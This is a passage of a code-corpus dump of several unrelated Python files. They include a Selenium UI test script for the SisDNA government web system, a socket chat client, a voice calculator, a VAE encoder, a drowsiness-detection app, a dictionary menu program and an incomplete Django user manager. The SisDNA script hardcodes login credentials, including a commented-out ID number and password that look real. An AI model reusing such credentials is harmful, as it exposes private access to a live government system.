Ingresar SisDNA.\n# 2. Salir SisDNA.\n# 4. 
Ingresar módulo y submódulo.\n\n##############################################################################################################\ndef diccionarios_SisDNA(nombre_diccionario=\"modulos\"):\n # navegacion_SisDNA[nombre_modulo][url]-> direccion modulo\n # navegacion_SisDNA[nombre_modulo][submodulos][nombre_submodulo][url]-> direccion submodulo\n # navegacion_SisDNA[nombre_modulo][submodulos][nombre_submodulo][css_evidencia]-> evidencia de ingreso a submodulo en modulo\n navegacion_SisDNA ={\n \"home\":{\"url\":\"Inicio\"},\n \"dna\":{\n \"url\":\"0\",\n \"submodulos\":{\"dna\":{\"url\":\"/dna/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt155 > div > span\"},\n \"acreditacion\":{\"url\":\"/acreditacion/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt480 > div > span\"},\n \"supervision\":{\"url\":\"/supervision/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt301 > div > span\"},\n \"capacitacion programacion\":{\"url\":\"/capacitacion/curso/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt181 > div.bctitle.clearfix > span\"},\n \"capacitacion ejecucion\":{\"url\":\"/capacitacion/solicitud/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt224 > div > span\"},\n \"reporte\":{\"url\":\"/reporte/\",\n \"css_evidencia\":\"#j_idt57 > div > div > span\"}\n }\n }, \n \"riesgo\":{\n \"url\":\"1\", \n \"submodulos\":{ \"recepcion\":{\"url\":\"/demuna/recepcion/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt155 > div > span\"},\n \"valoracion\":{\"url\":\"/demuna/valoracion/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt155 > div > span\"},\n \"evaluacion\":{\"url\":\"/demuna/evaluacion/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt155 > div > span\"},\n \"pti\":{\"url\":\"/demuna/pti/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt155 > div > span\"},\n \"reportes\":{\"url\":\"/demuna/reporte/\",\n \"css_evidencia\":\"#j_idt57 > div > div > span\"},\n }\n },\n\n \"mantenimiento\":{\n \"url\":\"2\",\n \"submodulos\":{\"municipalidades\":{\"url\":\"/mantenimiento/municipalidad/\",\n \"css_evidencia\":\"#frmBuscar\\:j_idt95 > div.bctitle.clearfix > span\"},\n \"catalogo\":{\"url\":\"/mantenimiento/catalogo/\",\n \"css_evidencia\":\"#content > section > div.bctitle.clearfix > span\"},\n \"parametros\":{\"url\":\"/mantenimiento/parametro/\",\n \"css_evidencia\":\"#content > section > div.bctitle.clearfix > span\"},\n \"colegios\":{\"url\":\"/mantenimiento/colegio/\",\n \"css_evidencia\":\"#content > section > div.bctitle.clearfix > span\"},\n \"carga inicial\":{\"url\":\"/mantenimiento/cargainicial/\",\n \"css_evidencia\":\"#frmDna > h1\"},\n }\n },\n \"seguridad\":{\n \"url\":\"3\",\n \"submodulos\":{\"usuarios\":{\"url\":\"/seguridad/\",\n \"css_evidencia\":\"#frmGestion\\:j_idt58 > div.bctitle.clearfix > span\"}\n }\n }\n }\n diccionarios = {\"navegacion\":navegacion_SisDNA}\n return diccionarios[nombre_diccionario]\n\ndef MoverClick(driver, elemento_click):\n try:\n mover_mouse = webdriver.ActionChains(driver)\n mover_mouse.move_to_element(elemento_click).click().perform()\n except Exception as e:\n print(\"Error en mover click: \",e)\n time.sleep(1)\n\ndef MoverClick_wait(driver,wait, elemento_click, css_elemento_wait):\n try:\n mover_mouse = webdriver.ActionChains(driver)\n mover_mouse.move_to_element(elemento_click).click().perform()\n inicio=time.time()\n elemento_wait = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, css_elemento_wait)))\n fin=time.time()\n tiempo = fin - inicio\n tiempo_formateado = \"{:.{}f}\".format(tiempo, 5)\n return tiempo_formateado\n except Exception as e:\n print(\"Error en mover 
click wait: \",e)\n \n\n# Darle click al vacío para que funcione\ndef click_vacio(driver, elemento_vacio ='j_idt22:j_idt24'):\n elemento_vacio = driver.find_element(By.ID,elemento_vacio)\n MoverClick(driver,elemento_vacio)\n\ndef limpiar_enviar(wait, id_campo, valor):\n input_user = wait.until(EC.visibility_of_element_located((By.ID, id_campo)))\n input_user.clear()\n input_user.send_keys(valor)\n\ndef boton_respuesta_lenta(wait, id_boton, xpath_elemento_esperado):\n try:\n buttom = wait.until(EC.visibility_of_element_located((By.ID, id_boton)))\n buttom.click()\n respuesta = wait.until(EC.presence_of_element_located((By.XPATH, xpath_elemento_esperado)))\n return 1, respuesta.text\n except Exception as e:\n print(\"El error en boton respuesta es: \",e)\n\ndef boton_respuesta_css(driver, css_id_buttom, css_confirm_window):\n buttom=driver.find_element(By.CSS_SELECTOR, css_id_buttom)\n buttom.click()\n confirm_message=driver.find_element(By.CSS_SELECTOR, css_confirm_window)\n return 1, confirm_message.text\n\n# Encontrar el ID existente sino retornar nulo.\ndef probar_ids(driver, ids):\n for id in ids:\n try:\n elemento=driver.find_element(By.ID,id)\n return elemento\n except ElementNotInteractableException:\n continue\n except NoSuchElementException:\n continue\n except TimeoutException:\n continue\n return None\n\n########################################################################################################\n# 1. INGRESAR SISDNA.\ndef Ingresar_Sistema(driver,wait, url_login = \"https://ws01.mimp.gob.pe/sisdna-web/faces/login.xhtml\", id_login_buttom = \"formularioPrincipal:j_idt45\",xpath_home_element = \"//div[@id='j_idt54']/h3\", username=\"admin\", password=\"123456\"):\n id_username = \"formularioPrincipal:username\"\n id_password = \"formularioPrincipal:password\"\n try:\n driver.get(url_login) #Ingresa al URL\n driver.implicitly_wait(5) #Se le adiciona un tiempo de espera adicional para esperar respuesta del servidor\n limpiar_enviar(wait, id_username, username) #Send username\n limpiar_enviar(wait, id_password, password) #Send password\n n , respuesta = boton_respuesta_lenta(wait, id_login_buttom, xpath_home_element) #Hacerle click al botón y esperar elemento del Home\n print(\"Ingreso del sistema exitoso: \", respuesta)\n return n \n except Exception as e:\n print(\"Error en el ingreso del sistema: \", e)\n return 0\n########################################################################################################\n\n\n########################################################################################################\n# 2. SALIR DEL SISTEMA\ndef Salir_Sistema(driver, css_logout=\"#j_idt22\\:logout\", css_confirm_logout = \"#formularioPrincipal > div > div:nth-child(1) > div > h1\"):\n try:\n n, confirm_message=boton_respuesta_css(driver, css_logout, css_confirm_logout)\n print(\"Salida del sistema exitosa: \", confirm_message)\n return n\n except Exception as e:\n print(\"Error en la salida del Sistema: \",e)\n return 0\n\n########################################################################################################\n\n########################################################################################################\n# 3. 
INGRESAR AL MÓDULO Y SUBMÓDULO\n\ndef Ingresar_Modulo_Submodulo(driver, wait, modulo_nombre=\"home\", submodulo_nombre=None):\n try: \n navegacion_SisDNA = diccionarios_SisDNA(\"navegacion\")\n modulos_SisDNA = list(navegacion_SisDNA.keys())\n \n \n # Verificar si el módulo existe\n if modulo_nombre not in modulos_SisDNA:\n print(f\"No existe el módulo '{modulo_nombre}'. Debe elegir entre:\")\n for modulo in modulos_SisDNA.keys():\n print(modulo)\n return\n\n modulo_selector = f'a[data-tooltip-content=\"#tc{navegacion_SisDNA[modulo_nombre][\"url\"]}\"]'\n modulo = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, modulo_selector)))\n MoverClick(driver, modulo)\n #print(f\"Ingreso al módulo ({modulo_nombre}) exitoso\")\n\n submodulos_modulo = list(navegacion_SisDNA[modulo_nombre][\"submodulos\"].keys())\n \n # Verificar si el submódulo existe\n if submodulo_nombre and submodulo_nombre not in submodulos_modulo:\n print(f\"No existe el submódulo '{submodulo_nombre}' en el módulo '{modulo_nombre}'. Debe elegir entre:\")\n for submodulo in submodulos_modulo:\n print(submodulo)\n return\n \n if submodulo_nombre:\n direccion = navegacion_SisDNA[modulo_nombre][\"submodulos\"][submodulo_nombre][\"url\"]\n elemento_evidencia = navegacion_SisDNA[modulo_nombre][\"submodulos\"][submodulo_nombre][\"css_evidencia\"]\n submodulo_selector = f'a[href=\"https://ws01.mimp.gob.pe/sisdna-web/faces{direccion}listado.xhtml\"]'\n submodulo = wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, submodulo_selector)))\n tiempo = MoverClick_wait(driver, wait, submodulo, elemento_evidencia)\n print(f\"Ingreso al submódulo ({submodulo_nombre}) en el módulo ({modulo_nombre}) exitoso: tiempo ({tiempo}) segundos\")\n except Exception as e:\n print(\"Error en Ingresar módulo submódulo: \",e)\n pass\n\n########################################################################################################\n\ndef Prueba():\n driver = webdriver.Chrome()\n wait = WebDriverWait(driver, 20)\n #Ingresar_Sistema(driver,wait,username=\"72623744\",password=\"123456$$dan\")\n Ingresar_Sistema(driver,wait)\n time.sleep(5)\n \n # Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"riesgo\")\n # time.sleep(5)\n\n # Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"dna\",submodulo_nombre=\"supervision\")\n # time.sleep(5)\n\n # Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"dna\",submodulo_nombre=\"dna\")\n # time.sleep(5)\n\n # Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"dna\",submodulo_nombre=\"acreditacion\")\n # time.sleep(5)\n\n # Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"dna\",submodulo_nombre=\"capacitacion programacion\")\n # time.sleep(5)\n\n Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"seguridad\",submodulo_nombre=\"usuarios\")\n time.sleep(5)\n\n Ingresar_Modulo_Submodulo(driver,wait,modulo_nombre=\"dna\",submodulo_nombre=\"acreditacion\")\n time.sleep(5)\n\n Salir_Sistema(driver)\n time.sleep(5)\n #Salir_Sistema(driver=driver,wait=wait)\n #time.sleep(5)\n # cont=0\n # cont+=Prueba_0(driver=driver,wait=wait)\n # print(\"Número de pruebas exitosas: \",cont)\n # driver.implicitly_wait(5)\n driver.quit()\n\n\n\nif __name__ == \"__main__\":\n Prueba()","repo_name":"danjoshuasg/pruebas-UI-SisDNA","sub_path":"acciones/acciones_movimiento.py","file_name":"acciones_movimiento.py","file_ext":"py","file_size_in_byte":13328,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"27680997099","text":"import 
socket\r\ns=socket.socket()\r\nhost=socket.gethostname()\r\nport=8080\r\ns.connect((host,port))\r\nwhile 1:\r\n print(\"Connected to chat server\")\r\n msg=(s.recv(1024)).decode('utf-8')\r\n if msg==\"b\":\r\n break\r\n else:\r\n print(msg)\r\n #print( s.recv(1024))\r\n message=input(\"-:\")\r\n s.send(message.encode('utf-8'))\r\n print(\"message has been sent\")\r\n\r\n\r\n","repo_name":"nablashan/watercan","sub_path":"python/clientserver/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39002459345","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 27 23:50:57 2018\r\n\r\n@author: shubham pathak\r\n\"\"\"\r\nfrom speechRecog import *\r\nimport playText\r\nimport operandGenerator\r\nimport operatorDetector\r\n\r\n\r\n# The text that you want to convert to audio\r\nplayText.playString('Welcome to the new age of calculator. How may i help you?')\r\nresult=0\r\nwhile(1): \r\n a=''\r\n b=''\r\n operator=''\r\n \r\n mytext = getString()\r\n if(type(mytext).__name__=='NoneType'):\r\n playText.playString('Sorry I didn\\'t get that. Try again')\r\n continue\r\n \r\n operator = operatorDetector.findOperator(mytext)\r\n if(operator=='c'):\r\n playText.playString('Thanks for using me. See ya. Good Bye')\r\n break\r\n elif(operator=='gtng'):\r\n playText.playString('Hello shubhi')\r\n elif (operator == '-1'):\r\n playText.playString('I dont think you are using me correctly. Bye bye')\r\n break\r\n a,b = operandGenerator.findOperand(mytext,result)\r\n if(a=='' and b==''):\r\n playText.playString('Sorry I didn\\'t recognised operands. Try again')\r\n continue\r\n if(b=='' or a==''):\r\n playText.playString('Sorry I didn\\'t find second operand. Say it again')\r\n while(a==''):\r\n mytext = getString()\r\n if(type(mytext).__name__=='NoneType'):\r\n playText.playString('Sorry. Please say the second operand again')\r\n continue\r\n try:\r\n a= float(mytext)\r\n except ValueError :\r\n a=''\r\n playText.playString('Sorry. Please say the second operand again')\r\n continue\r\n \r\n while(b==''):\r\n mytext = getString()\r\n if(type(mytext).__name__=='NoneType'):\r\n playText.playString('Sorry. Please say the second operand again')\r\n continue\r\n try:\r\n b= float(mytext)\r\n except ValueError :\r\n b=''\r\n playText.playString('Sorry. Please say the second operand again')\r\n continue\r\n if(operator == 'sf'):\r\n result = float(b)-float(a)\r\n elif(operator == '-'):\r\n result = float(a)-float(b)\r\n elif(operator == '/'):\r\n result = float(a)/float(b)\r\n elif(operator == 'dv'):\r\n result = float(b)/float(a)\r\n elif(operator=='+'):\r\n result = float(a) + float(b)\r\n elif(operator=='*'):\r\n result = float(a)*float(b)\r\n playText.playString('Answer is %0.3f' % (result))\r\n playText.playString('Do you wanna do more calculation?')\r\n mytext = getString()\r\n if(type(mytext).__name__=='NoneType'):\r\n playText.playString('We are unable to recognise your voice. Restart the app')\r\n break\r\n if 'no' in mytext:\r\n playText.playString('Thanks for using me. See ya. 
Good Bye')\r\n break\r\n else:\r\n playText.playString('I am ready again')\r\n \r\n \r\n\r\n","repo_name":"shbhmpthk/TalkingCalculator","sub_path":"Classifier.py","file_name":"Classifier.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14387662698","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib import rnn\n\nclass Encoder:\n def __init__(self, hidden_size, z_dim, time_steps, lstm_unit_size, action_num, state_num):\n\n self.h_dim = hidden_size\n self.z_dim = z_dim\n self.state_num = state_num\n\n self.time_steps = time_steps\n self.lstm_unit_size = lstm_unit_size\n self.action_num = action_num\n pass\n\n def create_network(self):\n with tf.name_scope('encoder') as scope:\n self.state_in = tf.placeholder(tf.float32, shape=[None, self.time_steps, self.state_num], name='encoder_input_x')\n # Unstack to get a list of 'time_steps' tensors of shape (batch_size, num_input)\n # unstack_state = tf.unstack(self.state_in, self.time_steps, 1)\n\n # 前向 cell\n lstm_fw_cell = rnn.BasicLSTMCell(self.lstm_unit_size, forget_bias=1.0)\n # 反向 cell\n lstm_bw_cell = rnn.BasicLSTMCell(self.lstm_unit_size, forget_bias=1.0)\n\n with tf.variable_scope('encoder_bi_lstm'):\n # outputs, _, _ = rnn.static_bidirectional_rnn(lstm_fw_cell, lstm_bw_cell, unstack_state, dtype=tf.float32)\n outputs, _ = tf.nn.bidirectional_dynamic_rnn(lstm_fw_cell, lstm_bw_cell, self.state_in, dtype=tf.float32) # [batch_szie, max_time, depth]\n\n\n\n\n with tf.variable_scope('encoder_lstm_output_avg'):\n self.layer_avg = tf.reduce_mean([outputs[0]], 0)\n\n with tf.variable_scope('encoder_lstm_linear'):\n self.layer_after_avg = slim.fully_connected(self.layer_avg,\n self.h_dim,\n activation_fn=tf.nn.leaky_relu,\n weights_initializer=tf.contrib.layers.xavier_initializer(),\n biases_initializer=tf.constant_initializer(0.0)\n )\n with tf.variable_scope('encoder_latent_mu'):\n self.z_mu = slim.fully_connected(self.layer_after_avg,\n self.z_dim,\n activation_fn=None,\n weights_initializer=tf.contrib.layers.xavier_initializer(),\n biases_initializer=tf.constant_initializer(0.0)\n )\n with tf.variable_scope('encoder_latent_var'):\n self.z_var = slim.fully_connected(self.layer_after_avg,\n self.z_dim,\n activation_fn=None,\n weights_initializer=tf.contrib.layers.xavier_initializer(),\n biases_initializer=tf.constant_initializer(0.0)\n )\n\n\n\n def sample_z(self, mu, var):\n eps = tf.random_normal(shape=tf.shape(mu))\n self.latent = mu + tf.exp(var / 2) * eps\n return self.latent\n\n def xavier_init(self, size):\n in_dim = size[0]\n xavier_stddev = 1. 
/ tf.sqrt(in_dim / 2.)\n return tf.random_normal(shape=size, stddev=xavier_stddev)\n\n def get_model_param_list(self):\n return [variable for variable in tf.trainable_variables('encoder')]\n\n# if __name__ == '__main__':\n# e =Encoder(1,1,1)\n# e.create_network()\n# e.sample_z(1,1)\n# print(e.state_in, e.z_var, e.z_mu, e.latent)\n\n","repo_name":"zhkmxx9302013/ReinforcementLearning_experiment","sub_path":"VAE-GAIL/VAE/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"1470255928","text":"from kivy.app import App\r\nfrom kivy.lang import Builder\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nimport time\r\nfrom imutils import face_utils\r\nimport dlib\r\nimport cv2\r\nimport time\r\nimport threading\r\nimport math\r\nfrom sklearn import tree\r\nimport pandas as pd\r\nimport numpy as np\r\nimport time\r\nfrom functools import partial\r\nfrom kivy.clock import Clock\r\nfrom kivy.graphics.texture import Texture\r\nfrom kivy.uix.screenmanager import ScreenManager, Screen\r\nfrom kivy.uix.widget import Widget\r\nfrom kivy.uix.image import Image\r\nfrom kivy.clock import Clock\r\nfrom kivy.core.audio import SoundLoader\r\nfrom threading import Thread\r\nimport time\r\n\r\nthread_running = True\r\n\r\nclass MainScreen(Screen):\r\n pass\r\n\r\n\r\nclass Manager(ScreenManager):\r\n pass\r\n\r\n\r\n\r\nBuilder.load_string('''\r\n:\r\n name: \"Monitoring\"\r\n\r\n FloatLayout:\r\n Label:\r\n text: \"Monitoring Drowsiness\"\r\n pos_hint: {\"x\":0.0, \"y\":0.8}\r\n size_hint: 1.0, 0.2\r\n\r\n Image:\r\n # this is where the video will show\r\n # the id allows easy access\r\n id: vid\r\n size_hint: 1, 0.6\r\n allow_stretch: True # allow the video image to be scaled\r\n keep_ratio: True # keep the aspect ratio so people don't look squashed\r\n pos_hint: {'center_x':0.5, 'top':0.8}\r\n\r\n\r\n''')\r\n\r\n\r\n\r\ndef training():\r\n a = pd.read_csv(\"blinkFatigue.csv\")\r\n\r\n features = np.array(a['BPM']).reshape((len(a['BPM']),-1))\r\n labels = a['FATIGUE']\r\n clf = tree.DecisionTreeClassifier()\r\n clf = clf.fit(features, labels)\r\n return clf\r\n\r\n\r\ndef Euclidean_Distance(x,y):\r\n dis = math.sqrt(sum([(a - b) ** 2 for a, b in zip(x, y)]))\r\n return dis\r\n\r\ndef eye_aspect_ratio(eye):\r\n A = Euclidean_Distance(eye[1], eye[5])\r\n B = Euclidean_Distance(eye[2], eye[4])\r\n C = Euclidean_Distance(eye[0], eye[3])\r\n D = (A+B)**2\r\n ear = D / (2.0 * C)\r\n\r\n return ear\r\n\r\ndef mouth_aspect_ratio(mouth):\r\n A = Euclidean_Distance(mouth[0], mouth[6])\r\n A = A**2\r\n B = Euclidean_Distance(mouth[3], mouth[9])\r\n B = B**2\r\n\r\n ear = A/B\r\n return ear\r\n\r\n\r\n\r\nclass Main(App):\r\n\r\n def build(self):\r\n\r\n # start the camera access code on a separate thread\r\n # if this was done on the main thread, GUI would stop\r\n # daemon=True means kill this thread when app stops\r\n threading.Thread(target=self.capture, daemon=True).start()\r\n\r\n sm = ScreenManager()\r\n self.main_screen = MainScreen()\r\n sm.add_widget(self.main_screen)\r\n return sm\r\n\r\n def update(self, dt):\r\n # display image from cam in opencv window\r\n ret, frame = self.capture.read()\r\n cv2.imshow(\"CV2 Image\", frame)\r\n # convert it to texture\r\n buf1 = cv2.flip(frame, 0)\r\n buf = buf1.tostring()\r\n texture1 = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr') \r\n #if working on RASPBERRY PI, use colorfmt='rgba' here instead, but stick with 
\"bgr\" in blit_buffer. \r\n texture1.blit_buffer(buf, colorfmt='bgr', bufferfmt='ubyte')\r\n # display image from the texture\r\n self.img1.texture = texture1\r\n\r\n\r\n def capture(self):\r\n global thread_running\r\n chances = 0\r\n drowsy = 0\r\n siren = 0\r\n endfps= 0\r\n startfps=0\r\n blink = 0\r\n blink2 = 0\r\n yawn = 0\r\n yawn2 = 0\r\n lastBlink = 0\r\n blinkDur = 0\r\n op = 0\r\n timer1 = 0\r\n thresh = 3.5\r\n frame_check = 5\r\n detect = dlib.get_frontal_face_detector()\r\n predict = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")# Dat file is the crux of the code\r\n\r\n (lStart, lEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"left_eye\"]\r\n (rStart, rEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"right_eye\"]\r\n (mStart, mEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"mouth\"]\r\n (minStart, minEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"inner_mouth\"]\r\n (leStart, leEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"left_eyebrow\"]\r\n (reStart, reEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"right_eyebrow\"]\r\n (nStart, nEnd) = face_utils.FACIAL_LANDMARKS_68_IDXS[\"nose\"]\r\n\r\n\r\n # make a window for use by cv2\r\n # flags allow resizing without regard to aspect ratio\r\n cv2.namedWindow('Hidden', cv2.WINDOW_NORMAL | cv2.WINDOW_FREERATIO)\r\n\r\n # resize the window to (0,0) to make it invisible\r\n cv2.resizeWindow('Hidden', 0, 0)\r\n cap=cv2.VideoCapture(0)\r\n flag=0\r\n flag1 = 0\r\n count = 0\r\n start = time.time()\r\n start2 = time.time()\r\n\r\n clf = training()\r\n\r\n\r\n\r\n while True:\r\n\r\n siren = 0\r\n ret, frame= cap.read()\r\n count += 1\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n subjects = detect(gray, 0)\r\n try:\r\n subject = list(subjects)[0]\r\n shape = predict(gray, subject)\r\n shape = face_utils.shape_to_np(shape)#converting to NumPy Array\r\n\r\n leftEye = shape[lStart:lEnd]\r\n leftEAR = eye_aspect_ratio(leftEye)\r\n\r\n rightEye = shape[rStart:rEnd]\r\n rightEAR = eye_aspect_ratio(rightEye)\r\n\r\n ear = (leftEAR + rightEAR) / 2.0\r\n\r\n\r\n\r\n leftEyeHull = cv2.convexHull(leftEye)\r\n rightEyeHull = cv2.convexHull(rightEye)\r\n\r\n mouth = shape[mStart:mEnd]\r\n mouthHull = cv2.convexHull(mouth)\r\n\r\n mouthEAR = mouth_aspect_ratio(mouth)\r\n\r\n\r\n nose = shape[nStart:nEnd]\r\n noseHull = cv2.convexHull(nose)\r\n\r\n\r\n re = shape[reStart:reEnd]\r\n reHull = cv2.convexHull(re)\r\n\r\n le = shape[leStart:leEnd]\r\n leHull = cv2.convexHull(le)\r\n\r\n cv2.drawContours(frame, [leftEyeHull], -1, (255, 255, 0), 1)\r\n cv2.drawContours(frame, [rightEyeHull], -1, (255, 255, 0), 1)\r\n cv2.drawContours(frame, [mouthHull], -1, (255, 255, 0), 1)\r\n cv2.drawContours(frame, [noseHull], -1, (255, 255, 0), 1)\r\n #cv2.drawContours(frame, [jawHull], -1, (255, 255, 0), 1)\r\n cv2.drawContours(frame, [reHull], -1, (255, 255, 0), 1)\r\n cv2.drawContours(frame, [leHull], -1, (255, 255, 0), 1)\r\n if ear < thresh:\r\n\r\n if flag == 0 and time.time()-lastBlink > 1:\r\n blink += 1\r\n lastBlink = time.time()\r\n print(\"Blink Detected\", blink)\r\n \r\n\r\n print (flag,end=' ')\r\n flag += 1\r\n if(flag > 10):\r\n cv2.putText(frame, \" STAY ALERT \", (200, 400),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1)\r\n cv2.putText(frame, \" DON'T SLEEP \", (200,450),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1)\r\n siren = 1\r\n\r\n\r\n else:\r\n flag = 0\r\n\r\n if(time.time()- start > 60):\r\n print(\"Blink Per minute :\",blink)\r\n p = np.array([blink]).reshape((1,-1))\r\n op = clf.predict(p)\r\n print('Chances of Drowsy 
:', op[0])\r\n start = time.time()\r\n blink = 0\r\n timer1 = 0\r\n\r\n if op[0] > 0:\r\n cv2.putText(frame, \" STAY ALERT \", (200, 400),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1)\r\n cv2.putText(frame, \" YOU MAYBE SLEEPY \", (200,450),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1)\r\n drowsy = 1\r\n siren = 1\r\n if(timer1 == 0):\r\n start= time.time()\r\n timer1 = 1 \r\n\r\n elif(timer1 == 1 and ((time.time()- start) > 10)):\r\n op=0\r\n\r\n\r\n if(mouthEAR < 5):\r\n flag1 += 1\r\n if flag1 > frame_check:\r\n yawn += 1\r\n print(\"Yawn detected\")\r\n flag1 = 0\r\n\r\n else:\r\n flag1 = 0\r\n except:\r\n pass\r\n\r\n\r\n\r\n endfps = time.time()\r\n fps = int(1/(endfps-startfps))\r\n cv2.putText(frame, \"FPS:- \"+str(fps), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1)\r\n\r\n if(time.time() - start2 > 30):\r\n print('Yawns ', yawn)\r\n print('BPM : ', blink2)\r\n\r\n if(yawn > 1 or (3 <= blink <= 4)):\r\n cv2.putText(frame, \"Chances of Drowsiness Soon\", (1, 100), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1)\r\n chances = 1\r\n siren = 1\r\n\r\n yawn = 0\r\n blink2 = 0\r\n start2 = time.time()\r\n \r\n\r\n startfps = time.time()\r\n Clock.schedule_once(partial(self.display_frame, frame),1/120)\r\n #cv2.imshow('Hidden', frame)\r\n cv2.waitKey(1)\r\n #cv2.imshow(\"Sleepiness Monitor\", frame)\r\n #Clock.schedule_interval(self.update, 1.0/33.0)\r\n key = cv2.waitKey(1) & 0xFF\r\n if key == 27:\r\n break\r\n if siren == 1:\r\n sound = SoundLoader.load('siren.wav')\r\n sound.play()\r\n cap.release()\r\n cv2.destroyAllWindows()\r\n '''\r\n Function to capture the images and give them the names\r\n according to their captured time and date.\r\n '''\r\n\r\n def display_frame(self, frame, dt):\r\n # display the current video frame in the kivy Image widget\r\n # create a Texture the correct size and format for the frame\r\n texture = Texture.create(size=(frame.shape[1], frame.shape[0]), colorfmt='bgr')\r\n # copy the frame data into the texture\r\n texture.blit_buffer(frame.tobytes(order=None), colorfmt='bgr', bufferfmt='ubyte')\r\n # flip the texture (otherwise the video is upside down\r\n texture.flip_vertical()\r\n # actually put the texture in the kivy Image widget\r\n self.main_screen.ids.vid.texture = texture\r\n\r\n\r\n\r\nMain().run()\r\n","repo_name":"ShanmukhP/Drowsiness_Detecting_Application","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7254708121","text":"\n'''\n---Program 16---\nWrite a menu driven program in python to create, add, delete, search and display dictionary details\n'''\n\nd = dict()\nwhile True:\n print(''' Menu\n#1 Create dictionary of names and ages\n#2 Add a key\n#3 Delete a key\n#4 Search and Display\n#5 Exit''')\n z = input(\"Enter your choice:\")\n print(\"\\n\")\n if z == '1':\n l = int(input(\"Enter the length of the dictionary:\"))\n for c in range(l):\n k = input(\"Enter user's name: \")\n v = input(\"Enter user's age: \")\n print(\"\\n\")\n d[k] = v\n print(\"The entered dictionary: \",d,\"\\n\")\n elif z == '2':\n if d == {}:\n print(\"Enter the dictionary first...\\n\")\n continue\n k = input(\"Enter user's name: \")\n print(\"\\n\")\n v = input(\"Enter user's age: \")\n d[k]= v\n print(\"\\n\")\n print(\"Updated Dictionary:\",d)\n elif z == '3':\n if d == {}:\n print(\"Enter the dictionary first...\\n\")\n continue\n k = input(\"Enter the key value to delete:\")\n print(\"\\n\")\n 
if k in d:\n del(d[k])\n print(\"Updated Dictionary: \",d,\"\\n\")\n else:\n print(\"Name not found\\n\")\n elif z == '4':\n if d == {}:\n print(\"Enter the dictionary first...\\n\")\n continue\n k = input(\"Enter the name to be searched:\")\n print(\"\\n\")\n if k in d:\n print(\"The age: \",d[k],\"\\n\")\n else:\n print(\"Name not found\\n\")\n elif z == '5':\n print(\"Exiting now...\")\n break\n","repo_name":"Impaler343/Grade11","sub_path":"DICTIONARY1.py","file_name":"DICTIONARY1.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22549187387","text":"from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.db.models import (\n EmailField,\n CharField,\n DateField,\n IntegerField,\n SmallIntegerField,\n BooleanField,\n)\n\n\nclass UserManager(BaseUserManager):\n def create_user(\n self,\n email,\n gender,\n food_preference,\n first_name,\n last_name,\n birth_date,\n phone,\n address_line_1,\n zip,\n city,\n state,\n password=None,\n address_line_2=None,\n ):\n user = self.model(\n email=email,\n gender=gender,\n food_preference=food_preference,\n first_name=first_name,\n last_name=last_name,\n birth_date=birth_date,\n phone=phone,\n address_line_1=address_line_1,\n address_line_2=address_line_2,\n zip=zip,\n city=city,\n state=state,\n )\n user.set_password(password)\n user.save()\n return user\n\n def create_superuser(\n self,\n email,\n gender,\n food_preference,\n first_name,\n last_name,\n birth_date,\n phone,\n address_line_1,\n zip,\n city,\n state,\n password=None,\n address_line_2=None,\n ):\n user = self.create_user(\n email=email,\n password=password,\n gender=gender,\n food_preference=food_preference,\n first_name=first_name,\n last_name=last_name,\n birth_date=birth_date,\n phone=phone,\n address_line_1=address_line_1,\n address_line_2=address_line_2,\n zip=zip,\n city=city,\n state=state,\n )\n user.is_superuser = True\n user.is_staff 